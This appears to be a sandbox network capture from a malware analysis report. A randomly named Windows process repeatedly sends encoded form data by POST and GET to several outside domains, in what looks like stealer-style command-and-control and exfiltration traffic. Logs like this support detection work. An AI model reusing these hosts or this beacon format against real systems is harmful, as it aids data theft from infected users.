                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("f2f7bb1aa6af792da44929d14f72c749");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K+ukJjVB5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMbIb+djSawZii0sFb5ZetUXWQKN4yoB6m0o=&Tr=kdnPUNSPd0&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49860 | 104.21.90.137 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:16:50.228120089 CET | 787 | OUT | POST /eaqq/ HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.ana-silverco.shop
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=AzG7TTHt+g90MJQ6LY7+1hXnX35zrmiwj0xm38+/F2kZQHr7Nsfiv1cTa8dON/ArQkbNJUdIMMv3uTVnEkoVRZCOPqlBS6qdTyTlcSf9VPwITm4deDeDysSKdONrCDm1fIIpWsvEIBmjRwb/1/w1caFnppREtV5AkxgJblfA6IBHiR5OpHX4CiaAtwo7Kw+J6Q==
Nov 29, 2024 09:16:51.341444016 CET | 905 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:51 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLS0Lu0gqL6tzqnbwqC5QEw7DbKy6XrI0qZVTtuLgooDy69F0WfMwDLoS%2BVJ9ZcL2mQhYRsywsOsYW1ArnytYh%2FjfbJ70z%2BWHsDS%2FSAgwsbOFvejD%2FYm1ImETG3bvqGlArpV7lYlGJw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea1286f99d743f3-EWR
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2098&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=787&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 190


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49866 | 104.21.90.137 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:16:52.890108109 CET | 807 | OUT | POST /eaqq/ HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.ana-silverco.shop
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEwZQmb7Mtfis1cTQcdPDfAgQkGwJVhIMMr3uSlnFUUWTJCMa6lDcaqdTyTlcSKqVPoITWIdYiec8MSJN+NrRTn8fIIxWtzuIDejRwL/0uw2JKFh2ZQzmGcbthZCYEbY8IxfnX0U422vQi+zw3hPHzDAhaPNX2x6uAakSEX/jvCMXbI=
Nov 29, 2024 09:16:54.018141985 CET | 904 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:53 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7CggccxsnXW%2FhR0TLeo3isDXG0YO%2BU95m02KrP0%2FlwXJBfHFrDD8CsGNsYNJFeYyQJ2UPf346%2BBXIpyxLCsnTQ78217dWrkbPm0%2FPzX7v0YRj2Rz0BmKLHbZyiUwj9mo6xA8136a0U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea128804e011a48-EWR
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 190


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49872 | 104.21.90.137 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:16:55.600591898 CET | 10889 | OUT | POST /eaqq/ HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.ana-silverco.shop
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.ana-silverco.shop/eaqq/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=AzG7TTHt+g90Opg6Q7D+5RXkYX5z5mjYj0Nm39qvCEoZQxz7NO3it1cTWsdCDfA5Qkf7JVtYMJ33uwtnMGwWaJCMFKlGS6qET2/hcRyqVPoITVQdfzec+MSKdON/CDmVfJgPWt3UIy+jQR7/54M2U6Fj1ZQrmGg+thFoYEvi8LtfmGR0gXyLSTfui2B5DyLnkdTHUX5b2zu7XjCpx+bHAvxsNHqhOh4H4RxNCmyilvJd7oR/vFvUO5qY50Cd94VtgNN0MsDKuliKsAUfQYZEvr4b+VGfZ8T/hAL767lXrOMTRpmC+pcsWL5/eKd7ORJOIdndCHI5w4vZB+1QJLmQ2A/1HMQKKJFK1fsePmJ+W07gE8OgOYsdC4L+6msPrHjEjRamv1tQ+Z1Kol2Es7DZ9YeKkDtalAha/Rc5+QVA8GcpuNMy7pooQ18RIHFmm/dNAbpZ4tcgc5EsQQ54Q/G3PQ4N6S/f3OwdLmtr0k92zK4Eq669g37hO2A2BkvMeLJYp+5XithWjY0FNNoCMTphBUHETnhnkVvRD4eTC6cv6IcJxNOGHQg6SE29HGaaTODwvKfwx2GcRO2Q+RfrSKZzEwbMCQ/9/ZUTB4+z0UtxLHlPVFQB220KZK2OC2LV1Y+fEePoidrtIC+bUlX3DrBu2uf+zVmOimyIjoRirctuZYUkmDLECYOWozLwfzz6o+yVaHaWaQ0mkoFziVF8a4TPM//RHhsTMvxQiKar9H+tjpHm+N83F+W21jAizRlGKuvarRI2scA0EIGX+7bV9jmTOZDAqMD+grZ95/EaLe0IsAoUM7zav2Old9CHYrH1MKTkqDVULT9xmcTSRQmC5IHMc9VO4VQUTkp4jYg4OOKVSqaQIl3MwSQkIgNMkpqbo993LAxwRk2TWC1CefbIQb/BMyhm3hdGNJzoQxhS74w/tAqaFsWMI4vgFdKJ9+THhcI0ojquFSyoTm1jy+hKv8PmTt3vibq1TuRpJf12yUfqf5AYK7 [TRUNCATED]
Nov 29, 2024 09:16:56.776603937 CET | 901 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:56 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYIhPh5v91Vr9cSSWglbYsqmgEjmFNNTRNR9DFBZZYyXgQSJYG%2BqypCdB7%2FbvwFgNfBnDWmd1MXkIp66zuJryFxLmbksWF73QJgMtCqSQ6MeX8P6cdsIlGG5COl1AMNrSJTRKiIvxn4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea128917f277293-EWR
                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1974&rtt_var=987&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10889&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 190


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 12 | 192.168.2.4 | 49880 | 104.21.90.137 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:16:58.256155968 CET | 511 | OUT | GET /eaqq/?Tr=kdnPUNSPd0&JZOtU=NxubQmq32TFwA/AheIz76Ea+WQ99/GP2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYoTrL75hLvWNXnWLMBeEVcMza3YNaS2pisc= HTTP/1.1
                                                                                                                                                                                Host: www.ana-silverco.shop
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                 Nov 29, 2024 09:16:59.486824989 CET | 847 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:16:59 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROENz4pmIO7tJtmEOnMzBV%2FbbB7QtIGe1M99XebE7TAis5sSU4olrQyJWrvygdyHvCAQrzF%2FDBLGiuL9ZkIep2vUU7YHxsV20LdPGHamYhcno%2FhwQStRNrItpxxIYt1C5QIwFAqa%2FTE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8ea128a269f743b2-EWR
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1679&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=511&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 13 | 192.168.2.4 | 49896 | 209.74.77.107 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:17:05.337042093 CET | 775 | OUT | POST /8q8w/ HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.gadgetre.info
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=lNO/w16Uo72uJYAJFTGVDDeT67fF6HKlxY0W5k5anAVOObN32IUMCtqJZbmTIYtPoE2MqqehOBniRmXRfuZmp0qMi1k+B3ZgDt6MhCamELGKKXtESn30LJsIYGuCSJFj4t7hyi1nurJZYwCLOP4qLd+Lfw/dHVgNGxSrU4kZcFQRVtkB8vXd1bFrJVBqzmsI3A==
                                                                                                                                                                                 Nov 29, 2024 09:17:06.465441942 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:06 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 14 | 192.168.2.4 | 49903 | 209.74.77.107 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:17:08.059864044 CET | 795 | OUT | POST /8q8w/ HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.gadgetre.info
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=lNO/w16Uo72uJ4QJDz6VEjeQkrfFwnKhxY4W5l8BmyBOO5F31M4MMNqJS7mWG4tEoE6Eqv2hOAHiRibRfZNlvkqSpVk4PXZgDt6MhBmMEI2KJn9ETDrzVZsHbGuCWJEk4t7Pyj4vupxZY1mLNbMtFd+NQQ+fD0xCDjanXZ04dRQUZLpbte2KnbhYUSIe+lRBsDGlOMmcy7ejaLwoIqOOIS4=
                                                                                                                                                                                 Nov 29, 2024 09:17:09.250885963 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:09 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 15 | 192.168.2.4 | 49911 | 209.74.77.107 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:17:10.858763933 CET | 10877 | OUT | POST /8q8w/ HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.gadgetre.info
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.gadgetre.info/8q8w/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                 Data Ascii: JZOtU= [TRUNCATED]
                                                                                                                                                                                 Nov 29, 2024 09:17:12.133003950 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:11 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                 16 | 192.168.2.4 | 49917 | 209.74.77.107 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                 Nov 29, 2024 09:17:13.600614071 CET | 507 | OUT | GET /8q8w/?JZOtU=oPmfzDvAiIeWP+diGQfRGlPJ8sXtmBaGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8ormKyt2wgYmNmcIv/8C26BoWgGWFvXlTdI6M=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.gadgetre.info
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:17:14.845067978 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:14 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                17 | 192.168.2.4 | 49933 | 176.32.38.130 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                Nov 29, 2024 09:17:20.429390907 CET | 790 | OUT | POST /j1io/ HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=L4AT1gMVwKs2qCJ63FTTXIsq0UVgxwwe1G7UyKvztjXcsj8GOF1bsPVDnNedzKMy+6GTDl1eaHsuXiUN1ljjb1SJs+OXNTiADb5QTnL4+XUaaLSLvIgAKAejFthhklvU4rHRSN7kDKuo8NJCAFSzoapiopwvGsLGSsSJL5poD544Mr4eF5T/wNmbLtNz2DVoHw==
                                                                                                                                                                                Nov 29, 2024 09:17:21.789715052 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:21 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                18 | 192.168.2.4 | 49939 | 176.32.38.130 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                Nov 29, 2024 09:17:23.088888884 CET | 810 | OUT | POST /j1io/ HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=L4AT1gMVwKs24y56k0TTSosp3UVg7QwS1GnUyPPjtRDcsH4GI01bvPVDz9eY9qM9+6KhDnheaHouXnoN1yfgBFSLkeOJJTiADb5QTnfS+R8aa/uLtpgHWwesGthhvFvQ4rHnSPPCDMqo8M5CDUSsxqp4spx6Gu2VUfzSC6pbcqxeAN1EUIyoiNCoWqEH7Aohc+q/5SNftCpm7LMyqSZ5aGc=
                                                                                                                                                                                Nov 29, 2024 09:17:24.445173979 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:24 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


